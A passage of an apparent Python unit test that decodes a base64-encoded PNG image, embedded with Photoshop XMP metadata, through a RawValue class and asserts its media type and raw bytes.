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\u003d\u003d' # noqa: E501
r = RawValue(data)
assert r.type == 'image/png'
assert r.value == b'\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x00\xfc\x00\x00\x00\xfc\x08\x06\x00\x00\x00S\xab\xc9g\x00\x00\x00\tpHYs\x00\x00\x0b\x13\x00\x00\x0b\x13\x01\x00\x9a\x9c\x18\x00\x00\x05 iTXtXML:com.adobe.xmp\x00\x00\x00\x00\x00<?xpacket begin="\xef\xbb\xbf" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c140 79.160451, 2017/05/06-01:08:21 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop CC 2018 (Macintosh)" xmp:CreateDate="2018-08-17T14:17:50-04:00" xmp:ModifyDate="2018-08-20T07:38:23-04:00" xmp:MetadataDate="2018-08-20T07:38:23-04:00" dc:format="image/png" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:1992c99c-613c-4035-a37e-84e3d01f4736" xmpMM:DocumentID="xmp.did:1992c99c-613c-4035-a37e-84e3d01f4736" xmpMM:OriginalDocumentID="xmp.did:1992c99c-613c-4035-a37e-84e3d01f4736"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:1992c99c-613c-4035-a37e-84e3d01f4736" stEvt:when="2018-08-17T14:17:50-04:00" stEvt:softwareAgent="Adobe Photoshop CC 2018 (Macintosh)"/> </rdf:Seq> </xmpMM:History> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>ft\x10\xb8\x00\x004\xe6IDATx\x9c\xed\x9dwx\x14\xd5\xfa\xc7?\xb3%\x9b\x90\x04\x12\x08\x89\xf4\x04\x10P\xaaT\x05A\xa9rQ\x04n x\x01\x95+\x82\x88\x15D\xae\xca\xcf. \xa8Xh\xd7\x8a"6\x90\xab\x88\x05\x11\x10\x94+U\xa4\xa8\x14C\xef\xe9@\xeanv\xe7\xf7\xc7\x88\x17\xd2vvwfwv\xf7|\x9eg\x1ee\xf3\x9es\xdel\xf6\xbbs\xe6\x9c\xf7\xbc\xaf$\xcb2\x02\x81 <0\x05\xda\x01\x81@\xe0?\x84\xe0\x05\x820B\x08^ \x08#\x84\xe0\x05\x820B\x08^ \x08#\x84\xe0\x05\x820B\x08^ \x08#\x84\xe0\x05\x820B\x08^ \x08#\x84\xe0\x05\x820B\x08^ \x08#\x84\xe0\x05\x820B\x08^ \x08#\x84\xe0\x05\x820B\x08^ \x08#\x84\xe0\x05\x820B\x08^ \x08#,\xee\x0c$I\xf2\x87\x1f\xe1\x82\x05H\x06R\x80\x1a@,\x10\xf3\xe7\x7f\x01\n.\xbaN\x01\x87\x81\xe3@\xa9\x9f\xfd\x14\x84\x08e3Z\xb9\x15\xbc\xc0k"\x81\xab\x81\xeb\x81\x0e@3\x14\xa1[=\xec\xc7\t\x1c\x05\xb6\x03[\x81-\x7f^\x05Z9*\x08#dY\xae\xf2\x12xD\n\xf0\x18\xb0\x1e(\x06d\x9d\xae\x12\xe0[\xe0\xbe?\xc7\x14\x08*\xa4\x9c\x9e\x85\xe0}&\x01\xb8\x07\xf8\t\xfd\x04\xee\xee\xfa/\xf0O Z\xe7\xdfU\x10d\x08\xc1kGc`\x1ePH\xe0\x84^\xf6:\x07\xcc\x01\x1a\xe8\xf8{\x0b\x82\x08!x\xdfi\t|\x84\xb2\x90\x16h\x81Wv\xd9\x81\xb7\x80&:\xbd\x07\x82 A\x08\xde{\xe2\x80W\x01\x07\x81\x17\xb4\xda\xab\x04\x98\x89\xb2\x13 \x08C\x84\xe0=G\x02\xc6\x02\x99\x04^\xc0\xde^\'\x81\x11Z\xbf1\x02\xe3#\x04\xef\x19I\xc0J\x02/X\xad\xae\xa5@MM\xdf!\x81\xa1)\xabg\xc9\x9d\xa8\xc38\xf0\xe6o\xc0\xbb@\xa2\x96\x9dFGG\x93\x9c\x9cL\xbdz\xf5\x88\x89\x89\xa1Z\xb5jDG+\x8b\xebEEE\x14\x15\x15\x91\x93\x93\xc3\x89\x13\'8y\xf2$\xe7\xce\x9d\xd3rxP\xee\xf6\xb7\x01k\xb4\xeeX`<\xca\xea[\x08\xbe<\x120\rx\xe4\xcf\xff\xf7\x1a\xab\xd5J\x9b6m\xe8\xdc\xb93\x9d:u\xa2Y\xb3f$$$x\xd4\xc7\xa9S\xa7\xd8\xb2e\x0b[\xb6la\xd3\xa6M\x9c8q\xc2\x17\x97.P\n\x8c\x03\x16j\xd1\x99\xc0\xb8\x08\xc1WM\x04\xca]\xfd\x1f\xdev`\xb1X\xe8\xde\xbd;7\xddt\x13\xbdz\xf5"**J3\xe7\x00N\x9e<\xc9\xe6\xcd\x9b\xf9\xfc\xf3\xcf\xd9\xbcy\xb3\xaf\xdd=\x06\xcc\xd0\xc0-\x81A\x11\x82\xaf\x9c8\xe0s\xe0:o\x1a\'$$p\xdbm\xb7\x91\x96\x96F\\\\\x9c\x86nU\xce\xbe}\xfbX\xb4h\x11+V\xac\xc0n\xb7{\xdb\xcd\x1c\xe0A\xc0\xa5\x99c\x02\xc3 \x04_1q\xc0\xf7@;O\x1b^v\xd9eL\x980\x81\xc1\x83\x07\x13\x11\x11\xa1\xb5_\xaa\xc8\xcd\xcde\xc9\x92%,Z\xb4\x88\xec\xeclo\xbaX\x02\xdc\x8a\xb2\x7f/\x08!\x84\xe0\xcb\x13\r\xac\x02\xbaz\xd2\xc8f\xb31f\xcc\x18\xc6\x8e\x1d\xab\xf9\xb4\xdd[\xce\x9e=\xcb\xacY\xb3X\xb6l\x997\xcd\xd7\x027\x01E\xdaz%\x08$B\xf0\x97\x12\x01|\t\xf4\xf5\xa4Q\x97.]\x98>}:\xf5\xea\xd5\xd3\xc7+\x1f\xd9\xb4i\x13\x8f?\xfe8\xc7\x8e\x1d\xf3\xb4\xe9\x7f\x80a\x88\xe9}\xc8 \x04\x7f)\x8bP\xa6\xb2\xaa\xb0X,\xdc\x7f\xff\xfd\xdcy\xe7\x9d\x98L\xc6\xce\x1dR\\\\\xcc\x9c9sX\xb8p!.\x97G\xfa}\t\x98\xac\x93[\x02?#\x04\xff?\xc6\x03\x0b\xd4\x1a\xd7\xacY\x93\xf9\xf3\xe7\xd3\xae];\xfd<\xd2\x815k\xd60i\xd2$JJJ<i6\x06xG\'\x97\x04~D\x08^\xa1\x13\xb0\x01eJ\xef\x96\x94\x94\x14\xde|\xf3M\xea\xd7\xaf\xaf\xafW:\xb1}\xfbv\xc6\x8f\x1f\xefI\x10O!\xd0\x11\xd8\xa3\x9fW\x02\x7f \x04\x0f\xd5\x81\xdd@C5\xc6\xad[\xb7\xe6\xad\xb7\xde\xa2F\x8d\x1a\xe5~\x16\x95\xbd\x95\xa8\xccM`\xb2PX\xbb\x1b\xc5\xf1m4vU;\xd2\xd3\xd3\xb9\xf3\xce;9}\xfa\xb4\xda&\xbb\x80\xce(\x07p\x04A\x8a\x10<\xccEIX\xe1\x96f\xcd\x9a\xf1\xfe\xfb\xefW v\x99Z{^!\xe6\xc4\xd7\x97\xbc\x9a_\xefF\xb2\xafxP\x1b/u\xe0\xcc\x993\x8c\x1e=\x9aC\x87\x0e\xa9m\xf2\x020EG\x97\x04:\x13\xee\x82\xef\x82\x92\x99\xc6\xed\x8a[rr2\x8b\x17/\xae0\x14\xb6\xc6\xc1\x0f\x88;\xf8n\x85\xedr\x9b\xdf\xcd\xb9\x06\x7f\xf7\xd1M\xfd8z\xf4(C\x87\x0eU;\xbd/E\x89M\xf8MW\xa7\x04\xbaQV\xdf\xc6^j\xd6\x16\x0b\xf0\x06*~\xe7\xe8\xe8h\x16,XP\xa1\xd8m\xb9;\x89;\xb4\xa8\xd2\xb6\xf1\x7f\xbc\x89\xed\xdc>_\xfc\xd4\x95\x86\r\x1b\xf2\xd2K/\xa9\xfd"\xb7\x00\xf3uvI\xe0G\xc2I\xf0w\x00\xaa\x1e\xb2\x9f\x7f\xfeyRR\xca\xe7\x864\xdb\xf3\xa8\xfd\xeb\x0c\x90\xab\xd8\xe6r\x95\x92\xb0\xfbYL\x8e\xf3\xde\xfa\xa9;\xdd\xbbw\xe7\xc1\x07\x1fTk\xde\x03H\xd3\xcf\x1b\x81?\t\x17\xc1[Q\x0e\x8a\xb8e\xf4\xe8\xd1\xf4\xed[Q\x1c\x8eL\xc2\xaf30\x97\xb8\x0f]\xb5\x14\x9d!\xe1\xf7\x17=t\xd1\xbf\xdcu\xd7]\xf4\xeb\xd7O\xad\xf9\x93\xf8xrP`\x0c\xc2E\xf0\xa3\x81F\xee\x8c\xea\xd7\xaf_\xe9\x9d/\xee\xe0b"s\xb6\xab\x1e0*\xf3\'\xaa\x1f\xf9T\xb5} \x98>}:5k\xaa\xca\x87q%0Tgw\x04~ \x1c\x04o\x01\xa6\xaa1|\xfa\xe9\xa7\x89\x8c\x8c,\xf7zd\xee\x0ej\x1c|\xdf\xe3\x81\xe3\x0f\xbc\x8d\xed\xec\xef\x1e\xb7\xf3\x17111\xdcw\xdf}j\xcd\xffOO_\x04\xfe!\x1c\x04\xff7T\xdc\xdd\xfb\xf7\xefO\xb7n\xdd\xca\xbdn.\xc9!a\xf7t\x94\x0cQ\x1e\xe2*%a\xf7s\x86~\x9e\x1f6lX\x85\xeb\x15\x15\xd0\x06\x0f\x0f\x18\t\x8cG8l\xcb}\x06\x0c\xae\xca@\x92$V\xacXA\xd3\xa6M\xcb\xfcD\xe6\xb2\xedS\xb0\xe5\xec\xf0\xc9\x81\xa2\x84.d\xb4{\xce\xa7>\xf4d\xcd\x9a5\xdcs\x8f\xaa\xd0\x84\x85(q\xf6\x97\xa3\xa4\xc0\x8eG\xc9\x88k\x01\xf2\xff\xbc\x8e\x03\xfb\x81#\x88C8\x01\'\xdc\xf6\xe1k\x03\'pS\xcfm\xc0\x80\x01\xcc\x9e=\xbb\xdc\xeb5\x0e\xbcK\xdc\xa1\x0f4q$\xef\xf2\xb1\x9cmd\xdc\xc5\xeeQ\xa3F\xb1m\xdb6wf2\xea\x17\xef\n\x81\x8d\xc0:`\x05\xb0\xd3k\xe7\x04^\x13n\xfb\xf0#PQ\xbcq\xdc\xb8q\xe5^\x8b\xcc\xd9N\xdc\xa1\x0f5s$.\xfd\x1d"\xcf\x1a7~\xe5\xde{\xefUc\xe6\xc9\xb7\x7f5\xa07\xf0,\xb0\x03%x\xe7\xa1?_\x17\x04\x88P\x17\xfc\x8d\xee\x0cZ\xb6lI\x8b\x16-.y\xcd\\\x92M\xc2\xaf3\xf0\xea\xb9\xbd2d\'\xb5v=\x87\xd9\xa1y\x16ZM\xe8\xd2\xa5\x0b\r\x1b\xaa:^\xe0-W\x02/\x02\x07\x80\tx^EW\xa0\x01\x86.\x17]\xb4 \xf9z\\\xae\x7fJ\xd0\x00Y\xfe\x1d\x93\xe9+[\xb2u-*\x0etH\x03\xd2#\x81\xee\xee\xecRSS/}Av\x91\xf0\xebt\xcc\xf6</\xbd\xae\x1cKI\x16\xb5~\x9dA\xc6U:\xe7\x8dt\x95\x12\x99\xb7\x93\xa8\xcc-X\x8bO\xe3\xb4\xd6 \xbf\xde\xdf(\xa9qE\xa5M$Ib\xe8\xd0\xa1\x15>\xdah\xcce(5\xf9&\xa3\xec\xef{\xbe\xfd!\xf0\x1a\xc3>\xc3\x17\xcfmp7\x12\xf3d\xf9\xd2i\xa4$\x91\x8f,}k\x82\xe5\xd6\xc8\xd8\xaf\x80\x9c\x8a\xdaKw\xfe\xd6\x1bX]\xd5\x18&\x93\x89\x8d\x1b7^r8&\xee\xc0\xbb\xd4\xd0\xe8\xb9\xbd2\xf2\x9a\xde\xc1\xd9d\xaf\x13\xe3V\x88\xa94\x9f\xa8\xac-Den$*k\x0b&g\xe1\xa5\x06\x92\x99\xec+\'\x93_\xa7O\xa5}\x1c=z\xd4\x93`\x1c\xad\xf8\x0fp;\xca\x82\x9f@c\xca\xea\xdb\x90wx\xf9\xf5f\t%\xa5\xc5\xb3eY.\xf7m#\xcb\xc4\x80\x9c\xea\x84TW\xc99\xa7\x0c\x1b$\x89/0\xb3\x1ce\xbax\x81\xde\xee\xc6i\xdd\xba\xf5%b\x8f\xcc\xde\xa6\xbb\xd8A\xf9R)\xa9\xd1\x8a\xe2\xf8\xd6>\xf5c)>MT\xc6OT\xcb\xdcHd\xden\x90\x9d\x95\x1b\xcb